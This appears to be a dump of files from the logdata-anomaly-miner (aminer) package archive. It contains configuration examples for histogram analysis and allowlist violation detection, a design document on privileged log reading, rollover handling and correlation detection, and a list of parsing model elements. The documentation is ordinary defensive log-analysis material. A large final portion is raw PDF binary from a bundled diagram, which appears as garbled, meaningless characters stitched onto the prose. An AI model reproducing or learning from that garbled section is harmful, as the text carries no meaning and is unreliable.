HistogramAnalysis.HistogramAnalysis, see the documentation there. 
* Example: # Perform path-dependent histogram analysis: from aminer.analysis import HistogramAnalysis # Use a time-modulo binning function modulo_time_bin_definition=HistogramAnalysis.ModuloTimeBinDefinition( 3600*24, # Modulo values in seconds (1 day) 3600, # Division factor to get down to reporting unit (1h) 0, # Start of lowest bin 1, # Size of bin in reporting units 24, # Number of bins False) # Disable outlier bins, not possible with time modulo path_dependent_histogram_analysis=HistogramAnalysis.PathDependentHistogramAnalysis( aminer_config, '/model/line/time', # The value properties to check modulo_time_bin_definition, 3600*24*7, # Reporting interval (weekly) report_event_handlers, # Send report to those handlers reset_after_report_flag=True) # Zero counters after sending of report # Send the appropriate input feed to the component atom_filter.add_handler(path_dependent_histogram_analysis) AllowlistViolationDetector: =========================== This detector manages a list of allowlist rules to filter parsed atoms. All atoms not hit by any allowlist rule will cause events to be generated. When an atom is matched by a rule, it will be regarded as allowlisted by default but there is also an option to call user-defined functions on a matching rule via MatchAction elements, e.g. to forward the atom to another analyzer in one pass. Predefined actions are: * EventGenerationMatchAction: Generate events, when a rule matches, e.g. to report interesting matches, violations or for debugging. * AtomFilterMatchAction: Filter out the parsed atoms on match and forward it to other handlers, e.g. analysis components. * Rules: The ruleset of this detector is created from classes defined in aminer.analysis.Rules. 
See below for a short list of supported rules, or the source for full documentation: * AndMatchRule: match only if all subrules match * DebugMatchRule: print debugging text when matching * DebugHistoryMatchRule: keep history of matched LogAtoms * IPv4InRFC1918MatchRule: match IPv4 addresses in RFC 1918 private networks * ModuloTimeMatchRule: match cyclic time values, e.g. nighttime * NegationMatchRule: match only if the other rule did not * OrMatchRule: match if any subrule matches * ParallelMatchRule: match if any subrule matches but do not stop at the first successful match * PathExistsMatchRule: match if parsed data contains the given path * StringRegexMatchRule: match if the parsed data string matches the given regular expression. If applicable, a Value[X]MatchRule should be used instead. * ValueDependentDelegatedMatchRule: select match rules according to values from parsed data * ValueDependentModuloTimeMatchRule: like ModuloTimeMatchRule but select limits according to values from parsed data * ValueListMatchRule: match if value is in the given lookup list * ValueMatchRule: match if parsed data contains a specific value * ValueRangeMatchRule: match if the parsed data value is within the given range * Example: # Run an allowlisting pass over the parsed lines. from aminer.analysis import Rules from aminer.analysis.AllowlistViolationDetector import AllowlistViolationDetector violation_action=Rules.EventGenerationMatchAction('Analysis.GenericViolation', 'Violation detected', anomaly_event_handlers) allowlist_rules=[] # Report things so bad that we do not want to accept the risk # of a too broad allowlisting rule further down accepting the # data. Rules are tried in list order, so such rules come first. allowlist_rules.append(Rules.ValueMatchRule('/model/services/cron/msgtype/exec/user', 'hacker', violation_action)) # Ignore Exim queue run start/stop messages allowlist_rules.append(Rules.PathExistsMatchRule('/model/services/exim/msg/queue/pid')) # Add a debugging rule in the middle to see everything not allowlisted # up to this point. 
allowlist_rules.append(Rules.DebugMatchRule(False)) # Ignore hourly cronjobs, but only when the syslog timestamp lies # between 17*60 and 17*60+5 seconds into the hour, i.e. the expected # start time; note the rule does not check the job's duration. allowlist_rules.append(Rules.AndMatchRule([ Rules.ValueMatchRule('/model/services/cron/msgtype/exec/command', '( cd / && run-parts --report /etc/cron.hourly)'), Rules.ModuloTimeMatchRule('/model/syslog/time', 3600, 17*60, 17*60+5)])) atom_filter.add_handler(AllowlistViolationDetector(allowlist_rules, anomaly_event_handlers)) logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/Design.txt000066400000000000000000000200101437606560100322550ustar00rootroot00000000000000Preamble: ========= This document describes the requirements, design and implementation of aminer. For using it, the general "README.md" may suit your needs better than this document. Requirements: ============= * IO-event triggered stream processing of messages to avoid CPU peaks and allow timely generation of alerts. * Sensible alerting model, e.g. sending of an aggregated report 10 sec after the first anomaly, then a grace time of 5 min. When more events occurred, send another report and double the grace time. * Have "environment" flags, e.g. maintenance mode to reduce messages under known procedures. Example: rsyslog should only restart during daily cronjobs, but at any time during maintenance. Design: ======= * Configuration layout: The behaviour of aminer is controlled by 3 different configuration data sources: * config.py: This configuration file is used by the privileged parent process for startup and launching of the child process. To avoid parsing and loading larger amounts of configuration into a privileged process, this configuration may contain only the minimal set of parameters required by the parent process. * analysis.py: This (optional) configuration file contains the whole analysis child configuration (code). When it is missing, those configuration parameters are taken from the main config. 
* /var/lib/aminer: This directory is used for persistence of runtime data, e.g. learned patterns, statistical data, between different aminer invocations. * Loading of Python code: aminer does not use the default dist/site-packages to load code. The rationale behind that is: * Avoid unused code being loadable or even loaded by default: that code may only increase the attack surface or the memory footprint. * Reduce the risk of side effects of unrelated updates: even though it is not good practice, some Python modules try to detect the existence of other modules to adapt their behaviour when available. This may cause unintended runtime changes when installing or updating completely unrelated Python software. * Log file reading: Those problems have to be addressed when processing a continuous stream of logging data from multiple sources: * High performance log reading conflicts with proper EOF detection: The select() call is useful to react to available data from sockets and pipes but will always include any descriptors for plain files, as they are always readable, even when at EOF. To detect availability of more data, inotify would have to be used. But while waiting, no socket change can be detected. Apart from that, the unprivileged child may not access the directories containing the opened log file descriptors. * Log files may roll over: the service writing them or a helper program will move the file aside and switch to a newly created file. * Multiple file synchronization: When processing messages from two different log data sources to correlate them, care must be taken not to read the newest messages only from one source and fall behind on the other source. Otherwise messages generated with quite different time stamps might be processed nearly at the same time while messages originating at nearly the same point in time might be separated. Solutions: * High performance log reading: No perfect solution is possible. 
Therefore a workaround similar to "tail -f" was chosen: Use select() on the master/child communication socket also for sleeping between file descriptor read attempts. After the timeout, handle the master/child communication (if any), then read each file until none of them supplies any more data. Go to sleep again. * Roll over: The privileged process monitors whether the file currently read has moved. When a move is detected, notify the child about the new file. This detection has to occur promptly, as otherwise the child process, not knowing about the new file, will continue processing and miss relevant correlated patterns due to reading only some of the currently relevant streams. FIXME: readlink best method? Inotify? * Roll over in child: The challenge is to completely read the old file before switching to the new one. Therefore the child relies on the notifications from the parent process to know about new files. When a new file is received, the old one is fstat'ed to learn the maximum size of the file, then the remaining data is read before closing the old file descriptor. * Multiple file synchronization: Useful file synchronization requires a basic understanding of the reported timestamps, which implies the need for parsing. Also, timestamp correction should be performed before using the timestamp for synchronization, e.g. host clocks might drift or logging may use the wrong timezone. When processing multiple log data streams, all parsed log atoms will be reordered using the timestamp. One stream might not be read at all for some time, when an atom from that stream has a timestamp larger than those from other streams. When reaching the end of input on all streams, marks on all reordering queues of unforwarded parsed log atoms are set. Everything before that mark will be forwarded anyway after a configurable timespan. This should prevent bogus items from staying within the reordering queue forever due to timestamps far in the future. 
* Input parsing: Fast input dissecting is key for performant rule checks later on. Therefore the algorithm should have the following properties: * Avoid passing over the same data twice (as distinct regular expressions would do); instead allow a tree-like parsing structure that will follow one parsing path for a given log-atom. * Make parsed parts quickly accessible so that rule checks can just pick out the data they need without searching the tree again. * Rule based distribution of parsed input to detectors: Implementation: =============== * aminer: This is the privileged master process having access to logfiles. It just launches the AminerAnalysisChild and forwards logfiles to it. * AminerAnalysisChild: This process runs without root capabilities and just reads logfiles and stores state information in /var/lib/aminer. AminerAnalysisChild processes data in a multistage process. Each transformation step is configurable; components can be registered to receive output from one layer and create input for the next one. * aminer_config.build_analysis_pipeline: This function creates the pipeline for parsing the log data and hands over the list of RawAtom handlers (those who will receive new log-atoms) and a list of components needing timer interrupts. Thus the need for multithreaded operation or asynchronous timer events is eliminated. * TimeCorrelationDetector: This component attempts to perform the following steps for each received log-atom: * Check which test rules match it. If no rule matched the data, keep it for reference when creating new rules next time. * When a match A was found, go through the correlation table to check if any of the other matches has matched recently. If a recent match B had occurred, update 2 counters, one assuming that A* (hidden internal event) caused B and then A, the other one that B* caused B and then A. * If the maximum number of parallel check rules has not been reached yet, create a new random rule now using the current log-atom or the last unmatched one. 
* Perform correlation result accounting until at least some correlation counters reach values high enough. Otherwise discard features after some time or number of log atoms received when they did not reach sufficiently high counts: they may be unique features likely not being observed again. This detection algorithm has some weaknesses: * If match A is followed by multiple matches of B, that will raise the correlation hypothesis for A*->A->B above the count of A. * For the A*->A->B hypothesis, two As detected before the first B will increment the count only once; the second pair is deemed non-correlated. logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminer/ParsingModel.txt000066400000000000000000000033701437606560100334400ustar00rootroot00000000000000Preamble: ========= Sorry, this part of the documentation was not written yet! Check the source code documentation headers from the files in directory /usr/lib/logdata-anomaly-miner/aminer/parsing. Here is a short list of the most common model elements with a short description: * AnyByteDataModelElement: Match anything till the end of a log-atom. * Base64StringModelElement: Parse base64 strings as binary data. * DateTimeModelElement: Simple datetime parsing using the python datetime module. See also MultiLocaleDateTimeModelElement * DebugModelElement: Output debugging information while parsing a log-atom * DecimalFloatValueModelElement: parsing of float values * DecimalIntegerValueModelElement: parsing of integer values * DelimitedDataModelElement: Same as AnyByteDataModelElement but include data only up to the given delimiter string. * ElementValueBranchModelElement: conditional branching based on previously parsed values. * FirstMatchModelElement: Branch the model taking the first branch matching the remaining log-atom data. * FixedDataModelElement: Match a fixed (constant) string. * FixedWordlistDataModelElement: Match one of the fixed strings from a list. * HexStringModelElement: Match a hexadecimal string. 
* IpAddressDataModelElement: Match an IPv4 address. * MultiLocaleDateTimeModelElement: Parse datetime elements with leap year correction, multiple locale support. * OptionalMatchModelElement: Match subelements zero or one time. * RepeatedElementDataModelElement: Match subelements a given number of times. * SequenceModelElement: Match all the subelements exactly in the given order. * VariableByteDataModelElement: Match variable length data encoded within a given alphabet. * WhiteSpaceLimitedDataModelElement: Match string till next whitespace. logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrol/000077500000000000000000000000001437606560100331255ustar00rootroot00000000000000Readme.txt000066400000000000000000000006701437606560100350070ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/aminerremotecontrolThis document contains step by step instructions on what needs to be done to fully support a new Detector in the aminerRemoteControl. - add the Detector class to the exec_locals in the AnalysisChildRemoteControlHandler class. The format needs to be 'NewDetector':aminer.analysis.NewDetector. - if the class supports allowlisting events add it to the checks of the AminerRemoteControlExecutionMethods.allowlist_event_in_component method. logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/diagrams/000077500000000000000000000000001437606560100306245ustar00rootroot00000000000000activity_diagram.pdf000066400000000000000000002470451437606560100345740ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/share/doc/logdata-anomaly-miner/diagrams%PDF-1.7 % 1 0 obj <>/Metadata 162 0 R/ViewerPreferences 163 0 R>> endobj 2 0 obj <> endobj 3 0 obj <>/Font<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI] >>/MediaBox[ 0 0 1087.5 818.25] /Contents 4 0 R/Group<>/Tabs/S/StructParents 0>> endobj 4 0 obj <> stream x=َVv Xiޝز=c9yO?iG}w}+Ш~k5t5o. 
.>k^B5~tѨV:ōK\=7(MSB(YOu  j]AuChB;mGhbDNg6Ci0# LJj uZ7-.a!tjHLgBj+Cf,kj17~?͘2eqtu5Cp?S]׼ \œ-~y%[Rek榽4nӴ&ny K7n^· jF?j/4Ś?oxt鷻9}Y,l^LՊ7o[C߮lP]Mt#VADݙXoqoⱴ0qXRpt|#Ղw]RaY.}p@[8U\Sk׵qg6V/N:Q)nQ(#\akŗ )ưyjH,eoVO37H` - 9P@ XE$)!tDXt2S[6+pe0@R Gg~;.<1<a:r_<;Dpm݀c]\R܏]x(eo ܒ[m6[czFp'~ -9rϠ^JP{޾]YQ遳{npD1ո8#IJ1$vD 6MQSqVc'1(ReXj[ۙ4X^\ve$c@bRq^TWw=u* @={g:o ]a3e0 smA ImO+`Wf|婭qWX[3'Z1 K9<Dz|C76 <%t@u_7-mNlZ!7=ǩK,Mm| "5F0=PtܶEyw$:w"=´=AD9^[b\Jʢ|. ,+; '^6"b,Ї-ҧ*֦B :4oj+Af,kj1\ yX*;xFĨUkk܏xQYR"[UuGX˰G0/zU$Z5fM#NP@pOidpIQ D@}{vz܂cH;"d Crw#"‹*)ԺG%HqO{Oe)Fptubd)d.^Bq0RL(-Ce0k Dž\55w=3#3Ls^8m1,;lpKp(PƤIǤC+iRkD&TrIc,Y~eЗ]Un='xv&Ȭ}NR04.Mvjb/NJ]#`@ջdtRxM0OL(~XsG:Mk3\ڤa.90GMDDOV qj z`YIUS 82gC!SqǞO/# 6aɫTŗhvmG ܴps?B&2ˁ5[:?7bG Mt\aխj\ꀠG|?h|'ȅEa {ȅ}2Lk0Ҙe8 A@Ã2ݠb5g q,C^Ԗˤ.as `R[ ȆX!h-ts)aUʪ y :tC@S^౽CZDE)5FEDQ!ʵjRVʸ>V$ҖUd*ʸ 2.aPV` AcdyS} eAv賅(] j%-xlW#pBd Ml % B%SSUPi0B&B6HJPP )TFXS[<鼗'aAs)Fe7D4ErF@ xʩ_ö#.,f781Sb%:na`ZUw{mVd 2&SEڀz _΋ kMT ؠf)<ڶT3[0d.416 u 4uϜl^ӱiNɜC[q K:#<]?-4|KE#.s' ]KbSމIi%fw+hmYvVuMj.yJȯa,Zh۞lfOWm,Vs5(n4=d0^oxs0JJqlwn}/evΚd|)&zd/0?n`֌V4*XH$3"I $l'!HBP`jRW  AEBDi QW ̃d`kj1ê쑛4c`B$zZ[I;*2>cAl7dCA]+w#:P`焴e<ʤUʹuB8 |D>9 P"? Q&:YE)/4s-OI3P+w싶TPTX%Q#lPK(qr #ABċ͞涜ܕKi0.w/# Ŕ #^Bgj0~Evs@jƆ}K"?11oxʍ3J{=_g/EpSyK̃G)vsW!9^ l%ɎSfեhW\3*4Bӱ ֜xBsALjY9eP+.*#tл㡞JěsFgm@tk7bYׄ‹(+" BDS !xjIȍ9!5 |e* (+9"V"`(+cMm<#?ʾsZzS]HǘSs9}⿐R.9c򶀢bMTrk|ÝOiAu sMY5}3T,q`l볺G,1֨,S_M?Z+sn?CsI eMact9U|IE{TPXMC9̫>I3Pvq@Ǹ+4ߢ02W1l+4>j DHLά7OXDvY#{O8>%]̉B\> {΂bB :YTn.`rg"#%C972恌ƙZ)LȘ~XZTP:P%AKU~~TL[5#ZD-.] 
=fGc~b!M2&f17Kֹw6S$k2btٸr7-Y 3"&yRoBG+oД_a08ȘS3/1"ҬCzOg`̏a83 0#06uL3u#0/jt( b2@aeApwpdsV^]LʟK(X3Y5H"qSb_f ֺa-j+Eku6SGO\iK$섭X3y{P,P]TQba!vEEBaIKhE:D D B"[ (8X$sι2{XMuhU]7Ǜ(0I Yi8}Hl+dtxt2|>Fe" mZc6M0yHF'Q)Y śWޡ%aktBU2{w8yW9H\*MGn^$"$"lz΂`~,TWVV٤~(hzdZX?gv=^l-n]8 2ߺWH;Q~ъY$w.\maֆs>#ԃ #_,tgHfgBXF6!}qlY`V0T35kQ&c|s.,.Eϥ͞?ι_JUE̽\*̾Fw6%f.vfZ@\HIqL˜”|2Eؒc)1j 2)Pz~lgU@iM.aj]۬Z ' ťyZ oT EqVv~jw"(y2K\pY):*tKbNOQp@{y>[9C]2(:N50#l솞tD e0RɈjSBJND8^tMn|^S&Mr gmsP=)Bvߙ91e$5'#9>vfV^>JU 1Ljf'%Y9) : J`˫GN[=R@Z|譐o!.| N%ʷvItb_-]@,}_UdJs'zp2ǽq7'+c?*ǚiH٥&yR)#Rb*8__sYCJdE=?%&+D֜YRWqW%E3Vkj1UC2s[q\ƃT,Gnues!aes%^l BBe267!&oHj7+uU6WS6CzSyZyk;`XiG6v2:a1s=MNy66[>)u;ǖ=3k aAB,,,P;V"Ү;!Ak]?8T&%O!=ʋleWSпp⧎{q9{Ya?kԯQn|k(R*)5YKc7jNl]ޕ4Cd{n z$S:hIEMҀFʽG 9) BBDEhDKUۍWMyη!g;{C<*@cbNF7@C´VBgҐF21P".a K QT`<Fßu_pt!vx}|Fw?Agm^üL9usᄜn 2[wGV_{NJd"lJҊg69ut< {zx ;nHpfbLj tZ=:2/""@~# &lww#%٦DŽ@ŬJDNΏ5 u9cV50&W$GEߊ } 4AǥjU߼( endstream endobj 5 0 obj <> endobj 6 0 obj <> endobj 7 0 obj <> endobj 8 0 obj <> endobj 9 0 obj <> endobj 10 0 obj [ 11 0 R] endobj 11 0 obj <> endobj 12 0 obj <> endobj 13 0 obj <> endobj 14 0 obj <> endobj 15 0 obj <> endobj 16 0 obj <> endobj 17 0 obj <> endobj 25 0 obj <> stream x[mop]rrqNqam'Iq|gKvC6%gvggf_B$**Jjbd""b*EJXP8Fa(H&BPfB$Q RzCf:HV8{ZȄLjD l0WRD4)*r Z aJ5p$Y"4+!̔$| 9>@b$ Aȧ<#=  Li* )@T W@9 F0&(2z/D'j2dHMP!58)A4(r$ Mg}Z6% EBSXA!fbgx*mnH`>n[@!a$C! 
=9O3DHAxeR}F7 ҒRcR-+TH8襈e@KfMYBI|$BH"мY S]%{3U@e1a'(wH`!hrwDL&),4!]=Z4;"020C*&$D12ӒJfY@Zj%IRJQ)MGŤz^REB@> ) wdc$Ix)HA!)JoQ Mz [Uo("3 CyjEw􏢜"?bz5Y~Q,?FPͷeUv~W[RӏB2EκU;\sc}#N.y+r`:ܒZh 9ly .<"*_ ]gfϴ^:m2bʌh^_6Ŭ(l+9!*zVQnٺ>V#ٙlEPՖ/mBdRg%6;ELqoC!9k<ɹXՁLL*`ʌ0!%<||ezr)|.;Tm;軰|ie |E\Sf<*,w/]alϺy9؁u|Z-WͬJ0^~^\U1e`=Á|Wͮ6Mk3F֩3n{LYYj=;noGh >h4h(PW=tNc,sS@0e#켐!Wwc_ bʬwĸÞ>l&l1eFLs9GbQ3ۺYbfw6pGa̔!;e?"-2v"nFQFQ3(KلLԬfQ'qW^vDsb]%* 2#nz1ciWˢoҋaS",oZﲄRo*.)1v>ZrS؅.4"/:E1eʼlnv{hQߘSP[~badL3\LsÔ;7b̈8A:4\ vz-}Όͮf9&~wj3Lfސ!1e!;oDvoH"v$/I7dt%Sf˃LSʺvZ?˻ ΄z֟Ū0j4sd 8qoՒ&ef,pӞ-a5Whk=zo'k犤7V)T_'iW9w߫;GT=3S+ tݺj{dyAqz3}e.$OLb\I=Πa\=n+4rǝ Zd۵!C; ;1NC&OXf\){l6'v;#hjWet쒑u?eL9ori_fz!Ɣpz'feݠwf\G`(s?_ =Wxh= |2nZ'v AA)3W2T+|LNuVm' MYzn#woˬ/ mӎ y|3{-pؗ>üK:ߙ鼙Jڏ9"&c^m={m+#p&} _̛x=fٓS=%cwsvkn }alnaUnXB4W 첓l0l =6XUFLkp~'̒AIOY1<>=E~,]4wҿU7dV 8mNR  ` 4~/WuezRV%mQtdd7Ϛz-~9b~Tp(]S^iYaO{tl7òP/Wə_ǶEצ;>yt{ su$z\fԌϖ\?˸~o)SKng@5ܷ'nn]mntxsrk6#͑oov=Oyo&= endstream endobj 157 0 obj [ 226 0 0 0 0 0 0 0 303 303 0 0 250 0 252 0 0 0 0 0 0 0 0 0 0 0 0 0 498 0 498 0 0 579 544 533 615 488 459 0 623 252 319 520 420 855 646 662 517 0 543 459 0 642 567 890 0 0 0 0 0 0 0 498 0 479 525 423 525 498 305 471 525 230 0 455 230 799 525 527 525 0 349 391 335 525 452 715 433 453 395] endobj 158 0 obj <> stream x}|T;f7eM%d%l tB,i4),&%$N+vn`E/vޯ~˽P7y;333gVC츘(txQ ED_ģ DarĀD<Ԫ^P/#^ܵgnNd~x $Z|gvݙlBtϩy~ċBsݛ*"y΂嫮"߃Ds-ra3oUe @>kA޺[/ }ª7q-_ZxѲ-ڄT.ݩ#ѺW$"lG03bH$x֨:p҈ (}[:5k#R]z*QN9<Ր<2|/B3/&Ř5M3ٲ:1Z;"/ar""hSJ0Ekx Orӿi n*}Mۦ/ڧ{O^1f:XF-d1w: {<|:U{u:Tv8K#N%skNt:[0M3yZpҼZڧTwBUꋯ;cֆ>u'^z<=4TڮLXq0FN9w2†/> ۥߠzkTq<"{w=%veZߠL6z(eJV]pܣ{X|?AߵJ7ie=_] kj63dukQFQFssտWٟ.?T _O2*jv,d)fzo'3GJ>0EtӧENy2kGڴei P : Sh! YB,d! YBM~4L[3zwQyS~4|,d! YB,d! YBǙ՟rYB,d! YB,d! YB,d! YB,d! YB,d! YB,d! 
-m+K\[PP_6MֻMVj_}C/d n~8Ђ'U ^u}~5 (㔅> E!BMGe\h"FEH]Q!:Hԋb8_\(.׉]bx\<%/tISb ;t_BZ 0~۸&؃^o0UTlg:I7qGW'|mFwzG~ju{OUi]l&+MhZedȶ\쥙HJ8ys<~RU9>ӠrZW3* ~oꑍ73|_ϪY=GrUmǭ-VZ+*щrJ9w>%IeF`5B*9E]Bn.)C}[4s9v-'d5;+5\e W.-Omw;ew4joǕVe-VWӂU;(2x\FR>2 U w ]$̂2KU F:23~I`̙~kXv8Zզqi٠n6 ll`0۩ɱ5qTYz&V.|.]~*s׺ݘC eor;f{LIE񴃳]s9 dV9XqjGGllWccMr*;!{wlg&+EeV`csW]vWqcUsK&qqQXQ5IeCF's1bLi>Bi4yy*؉\畖4T7uF^^W^ LH{D FpfAϪ|5FYƍ8U78ǫJೲKw ".s$Hdk"9 Fi6 C*]xDpA;M8sn M^#`VZ. q}z(Eo\Q"_fa!O\5r-XY.wJ\ŷ 0kahqX?]tK?L-"IaMҍ+ך.C[ZJ2^t,Z T=x3GJGd;W&Z2GUc](2(Qlԑ 1ת܆C#oZ6Xv?teqLsQNyc`GdnѤ28y,QhyYՕ.#e`O-|SVG0dH[?'[Ȟr1gZ˹FjsmGEYm2XQ-ތʢ0%4ѽ [lɂl-sTn\?wl`d0>Zdϣ0[rưwȷ؃J;S<={mj;y/ Y- `9*J&m`aph7 Z::O\B'{ٯm ״>DD0?}rNkX̞|@W^2TEq5ny1*Cj]ur4Tfb#`qecqZǩLkV3HZH+dZTy9i);A1-" R@2a4+ZT S5L*JLӹ4NMeTTTtd&S)$L%L3ct:((hc (8TTyù) c:i(4be4?ԗaԋ0z='Se};g {Lrw86[g t zuv*+L/sEgz< ;fzI}LOpqLqޣLad%ws]L;v@@P~eδ@k'r7]w'L3t+-L[n`7qn뙮cp5b λ\t)]t1EL[.p|63m $V6ge:'8 t6YD!Xl$gZr5L53*L+Ꙗ3-KŁj"K.`c4i.כ4[62pjLULL3sq˦2MNWprQ|#G)e4$M$;$=.phl t.2it 1S#F8TH * $l@bp&/SӰ@4N Ė0 ʩ1)7;40[~L}٠>\w VvW V\!3u`]0e1eb(ufrsN38)129R:@tP}())))+r;;clLQ\2KF3da f.ibΤ1 &tJvq}8 '#8W__Ev~= 1W#?>G/wwmoz;asnr |x ؏{3=<x[(HQKE-s>ܹhv y;#tyoZum|p+9y3M77@_X!ֵu |WWWWޥwI8Evnya]΍z\=yuk𝵭η~:_:αn̺5붭{o7.,booͶվ3}+}=mYFPߊm>S}Bzz^֋^Bz{^Z[[mNXڰԿ4ĿR施;:ҋ޵Km%EZ͝훳moVnv[:w*7#woi)*|e3P~rnϷ7)7q[o|88motHߨm#}#r}E k E=ӗ/yOꉏ_k11"&%FƠ1hM^Zuot16M#%jBiqL3REԼyOOgt\/[1*2^l9H7f,-W]?݀~ޢK59Y@Xk*`%ˀ%b`Xy\`05@50*t`0T@p0$`"PL〱`40  "(C!`` ~@_=@6݀@ :n'H:@ Hx @  ؀( +`3`ނhj|(p8   w{;[ 57K s3ScGC}/{;[k+K~Ey9Yi)I`g q`/(0 hv 4~~>^`; p7pp'pp;pp+p    \\4MF ֿX_` /ֿX_` /ֿX `=@`=@`=@`=@`=@`=@`=@`=@` /־Xk_` }/[݀re̤%ϐd~KeͣeԀM.=I@]K[Nqz9u;zyE)Z>#N]iW mFz#%_WэX*GU[YlZn5ҷt]R̞;m_t[|k<9?5QvN<h75;Gh!̐Gi/v'wsS+!S:DX5SXXszrC2FM"IVK\lT©G6%X i9:QE(8Y-팄T"›"U]^m5ʸzL)vvge)aI(GisQq> ə6-àXؾ}b%<ӂoMGȨl'Yj A<̤0u3h)+k@ŭgžtfƇlNMˌV0:vIwuO6'NKrDtKTrp[H2"nrd fv"N'?zSv1i.Q0R_޽]SO"?112[ΖelY8[~e.h% vDŎHɚk7RLCޖ/,",w0X1Dδ!󺇅\AH:;%%P0X8yFAr$D7c(O.XrIp掯^2}u _Q'3{E]IɭW0q@q#?4 K,;ma]Lgwqf۳tDn\D 5szԣCypPԁ=W|g2c14EOp_Q#GEϣZ_"2(Kd'ݩ?='cyᲿ#֔,rveg5uEu{tCM > 
amvN"ĄtM(lMX3jt+rU;fdFd-5W_2e첒~10}=9.:[Gx/OMtuwDǧ%ƇwRk0<+'+,6] \s9t12Dr~'`0LєeJp^G4!-1QGj2\T#wMƨu%fY2Pg7jZfi3.|wwƘVwqcɮ~t{Үyqu_b58^WŃZ\)ɝbû/>i;G>,f3.`qM͡dw`ף] v=*`/oMH:WKe[ؑWywl9$NNHl'@ҰtZ(m黽$vb{h)_x^hBbsf1ko}hΙ9CSq'c9'"ZgMcv$w1ɵY3<"#,0|'*ʲMՌJねK"+2΢}!IV U%+8VlRkK@r-1r@2Xb %3D,_[ b[2|#}Ӿ=;Tc1U*p 8gNJf`Ƌ&Z85`wT~]QaVǸ==Bc'fYF/J:31٬P0I"Ed<߻{w!H3GLef?rhs(05bh58c ̸gl!!% 7[VNUϪgxkt, 1;XjAUDeLS|Vq:tdҞHny B|c}:F9ɮOH Z_o}:Mӧ0{3tf [v <"0!Z Pn Aj QHcz-Q9$`&ɰhÜq\et2>98Wĭ5#Z'&k;}P_r@`2'\hX8[=0ȅ\^RB̀5ù66ù7Ckir"sXZ*@Q PT(z{x6ko UCyL/3@`G볰 :`e)/]'/%ռnH4)fN::`XzmQ 27t9] u_7U[BZGg A q3RIހ9kH {vim {;r촶 8p!ON_]W+FuRܥ_*֮y6Oe<&NSK}]0..:DA\=s̡~ZFH'(֌x$ˉf9xN{XjE[LK\ظ @]yu9I pg, =!Qcp2W.AW.5R9ɮv9Ɛ^whdO85ҭ]i3k)r4liZL_qiK8R1ꐷymyukCc57o3:|fN&Yy<mt^ z؜R]CC/Cu![CM'be6TfSæM ?̙v¬ FƄ1WYW(ER:H P~g%N9e)Ӧ;4ԫfv|qD;huw\*l>v2 dH,V$TƝ3īxD:Z w̫NȚ!"U1IcR2"SS4Ycd|2:Q:MBAAq8l6-M D& TtL: w _XO2^XC(2zT'<p퀙̽ /Wָ")RHZ*2F w{jFm-.F&[HXt$#p5<ސk"@b gΝZ8#LьܹV5D6DS`?^(9#y?8E@& bS=+35ht4S)Zi@(|\VӢb|4@/.SO&H PeaȉBvba'd |KQ#$84=|g WLVY@8 1P _@,'~ 1c>OroW;ʺӠqZ8RVEEWeaN#?R\M;ݷ~,zӆZs)lkLW<++z<ݸ/<Ow+Rg`jz6Zm]umxwT- oQIlv%Q YKx:='8@xA7$y|c.Xẓ7@FNqQVw4gTT .K_Eq6l?p蘜ju@Dsl VOW뵌' {[~!p&Ln`: y v<XPD KV]g5;d]Y. Y0q5;f m߯^{vTK.Ec}?}];[ο0%xpbܘE7͘7X9>іOԋU#οɨD|FOkj+cT i^s L4GSop:h? 
HVC .ad ?Ytthfv=-0L#™.YQS{228OYRUym[Fcz|൅{3 H*/2lr{_(eȟ<x77%)Vm'VfwJq%wQ< dNsޑQcVnّ}]E][A-n,LP -kojhel]mSSQV_km]=׬o]fxUh6#݆xH=~53aB*2  \6>Nř /`E/ 9-mK\&R)Ŷ:C|ЊZ.+̠ ޷h<\p/; UZZ"ҥ;]KZ""_jupj|}!4#AlR*}f` fW(!E;Wnp&cp3h ;v ?~իkih4oԋ,R;˕.Ceuu駈v,qa,1c 'gĒ=(5'Q*O IUxAqlCwخn"vk6 u 2ZRVpAB\3s +🀣$< "Wc zVp% +3Z?\XŅPQY.j/ Ƃ.7̢ȟo-RXFZ$.duA} 6/ q'2\PQLv SDqŊz>jjfhhp'M: ADG$WtxS#sp^s<UK<H[">4Ҋ>Lq7 L4aT!wVLYEV@uZPַtf͞'$ :Ek8NI8ۃ"2z@?m<;n\phx(T\$£^~C50&KPsiBPwX45F?J$q,IK@J]7N}7;=nCayC.@xoO={?wF/y=C4v``}n LUZ+ˉEU+ ]Y"h{H."[.uwXZ[/ITӫgM*_0a04 *uAg="qV{]hm?s)}d)**3we ~e ~8Oز7$CU鰾U#+_jq8K6;^cyVV?Ef#F-W]SkH@OX1KkhekiZRzᵨ^8z (,a0vxߌ5hnx; 8JP/29hw-1VYuy?*/0XO/2FVl)@l;?<H:!HS,O~o Aly3%#_gy0.3B lXjcFa^hBNq~*~n{}n-Zf7^xCKpY}€~ljYS: ,kӍ@ϣҶf,s&+'dPG2QʺZۿ .* hޘ̊ntZ¤7Fַ9llpQ1eo9fzԩӢ˻- 9'ӝ`\@B@v /L++=&$Z^EJ#U]n7u&?,=9qc f 'VuHWhF+ ٬ZҰ]l^վs^+p?a޸~4IDy>E!c0*7x]=׬kМAzv6n6dm"  a;xf$Fo&[=i\o茭l+k6տ[5"49VTj ( o~#TDy3/o0|1kZ]_Pr Eާw~Sm \!ɠ-ܾDDYo&GPrg0w,jCz~ \$6pX$iNKBBhUBf7v,v``,nOfckƈtv:su׌} 5W7ғgQ9 D,pWZ8;uZ8)"{p|c6-L#@xMW]B/kKy\^ļ'/KbQR+pNa-VaZT^{|d!mKnXU=D~{me4 h500(>Uw;I0%(}eXƳ'g]cnY氿ݻU4 ]5|v=顶f;_r4e09*MG `Lgr@,~Xs2'u+h}Wa2d`jN:ӄdD]iZaH%)';J, `YueDzU+%rHôg,dꮉ{-K[|to'9tڳQG0rc=y@_w.`xzt't?5bo $:v7f~9P wB*"ٹ7|mrFJ%HʃT?uEILtZ]:`X[/>Ǘ*fse:f78-OTwLڻ={;6\.%I^ŀBH^. 
